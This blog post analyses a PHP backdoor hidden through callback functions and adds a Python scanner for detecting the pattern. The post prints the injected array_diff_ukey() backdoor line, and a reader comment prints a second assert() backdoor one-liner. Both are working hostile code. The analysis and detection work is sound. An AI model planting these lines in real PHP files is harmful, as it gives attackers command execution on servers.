PHP Callback Functions: Another Way to Hide Backdoors

We often find new techniques employed by malware authors. Some are very interesting, others are pretty funny, and then there are those that really stump us in their creativity and effectiveness. This post is about the latter.

Everyone who writes code in PHP knows what the eval() function is for. It evaluates a string as PHP code. In other words, it executes the code. But there are certainly many other ways to run code, some of which are not always so obvious. The most popular and commonly used one is the preg_replace() function.

According to its description, the preg_replace() function “performs a regular expression search and replace.” Unfortunately, when the “e” modifier is used, this function also executes the replacement string as PHP code. Yes, there are more ways of running code without using the eval() function; create_function() and assert() are two other examples. All these options for running code make malware analysis a more complex process.

That being said, even with our insights we continue to find ingenious ways that malware authors are employing for their backdoors.

The Backdoor

It started with the following line of code injected at the top of a legitimate PHP file:

@array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']);

It took me a little while to understand how this could work (and thanks to Ante Kresic for helping me here), but in the end, I realized that the problem is in the callback functions. Can you see why?

The malware author set the callback function to the request variable “login”, which is controlled by the attacker. array_diff_ukey() invokes that callback with the array keys, here the “password” and “re_password” values, as its arguments. So he can set login to system or exec, allowing him to execute commands on the server.

Take a look at this example:


Yes, the attacker just ran the “system” command using this technique. The malware authors can execute any other commands they want on the server with that one line of code. To make matters worse, that little payload was not detected by any anti-virus or security software that we tested.

What’s the Big Deal?

Most security tools and articles online recommend that webmasters look for a certain subset of functions that are often used for malicious purposes, like eval, preg_replace, base64_decode and a few other combinations. Well, guess what, attackers know that too, and look at what they are starting to employ: good functions for bad purposes.

Also, note that they are not restricted to the array_diff_ukey() function; any other function that accepts a callback will do.
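One way to audit a code base for this pattern, as an added example that is not from the post or from Sucuri: a small Python scanner (every name in it is my own) that finds calls to callback-accepting PHP functions and flags those whose callback argument comes from a request superglobal or is not a literal string. The function table is an assumed, deliberately short subset of PHP's callback-taking built-ins, not an exhaustive list.

```python
import re
# PHP built-ins that take a callback -> 0-based callback arg index; -1 = last arg.
CALLBACK_ARG = {
    "array_map": 0, "array_filter": 1, "usort": 1, "uksort": 1, "ob_start": 0,
    "preg_replace_callback": 1, "call_user_func": 0, "call_user_func_array": 0,
    "array_diff_ukey": -1, "array_udiff": -1, "array_uintersect": -1,
}
SUPERGLOBAL = re.compile(r"\$_(REQUEST|GET|POST|COOKIE|SERVER|FILES)\b|\$GLOBALS\b")
CALL = re.compile(r"\b(" + "|".join(CALLBACK_ARG) + r")\s*\(")
def split_args(src, start):
    # Top-level arguments of the call whose '(' is at src[start]; nested brackets
    # and quoted strings are tracked so the commas inside them do not split.
    depth, quote, buf, args, i = 0, None, "", [], start
    while i < len(src):
        c = src[i]
        if quote:                                   # inside a string literal
            if c == "\\" and i + 1 < len(src): c += src[i + 1]; i += 1  # escape
            elif c == quote: quote = None
            buf += c
        elif c in "'\"": quote = c; buf += c
        elif c in "([{":
            depth += 1
            if depth > 1: buf += c                  # outermost '(' is not an arg
        elif c in ")]}":
            depth -= 1
            if depth == 0: return args + [buf.strip()]
            buf += c
        elif c == "," and depth == 1: args.append(buf.strip()); buf = ""
        else: buf += c
        i += 1
    return args                                     # unterminated call

def scan(src):
    # (line, function, severity, callback) for each callback-taking call whose
    # callback is request-controlled ("tainted") or a non-literal ("dynamic").
    findings = []
    for m in CALL.finditer(src):
        name, idx = m.group(1), CALLBACK_ARG[m.group(1)]
        args = split_args(src, m.end() - 1)
        if not args or idx >= len(args): continue
        cb, line = args[idx], src.count("\n", 0, m.start()) + 1
        if SUPERGLOBAL.search(cb): findings.append((line, name, "tainted", cb))
        elif "$" in cb: findings.append((line, name, "dynamic", cb))
    return findings

# Constructed sample: the injected line from the post plus one ordinary call.
SAMPLE = r"""@array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']);
usort($rows, 'cmp_by_date');
"""
```

A "dynamic" hit is not proof of malice, only a place where the callback cannot be read off the source and deserves a look.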

There goes the neighborhood…

About Peter Gramantik

Peter has been working in Information Security for over 10 years. He previously worked as a Virus Analysis Specialist for AVG and now holds the Sucuri flag as a Senior Malware Researcher. When he’s not on the clock, you can find him singing and playing guitar or ukulele in one of his bands, fishing, riding his Harley Davidson Sportster, or researching malware on his own. Follow him on Twitter at @petergramantik

  • The XC3LL

    That was found in real malware? In March I published this way to hide backdoors on my blog, but just as theory. It's pretty funny to see how malware in PHP is so easy to hide

  • David Watkinson

    Shouldn’t it be “all your data ARE belong to me”? lol
    On a more serious note, I would doubt that anti-virus would detect that, but security systems should have detected it or at worst flagged it. Maybe security systems should be looking for access methods within code also.

  • mathews

    eval() code is used for evaluating PHP code used in a program. Thanks for sharing such an informative blog.

    PHP Training Chennai

  • Chilion Snoek

    Sir! How can we check for those damn functions? :(

  • Anandajoti

    Thanks Peter, we finally found the backdoor thanks to this.

  • unkulunkulu

    Hahaha, just got an email with a suggestion to put
    assert(stripslashes($_REQUEST[roskomnadzor])) at a specific address. Thanks.
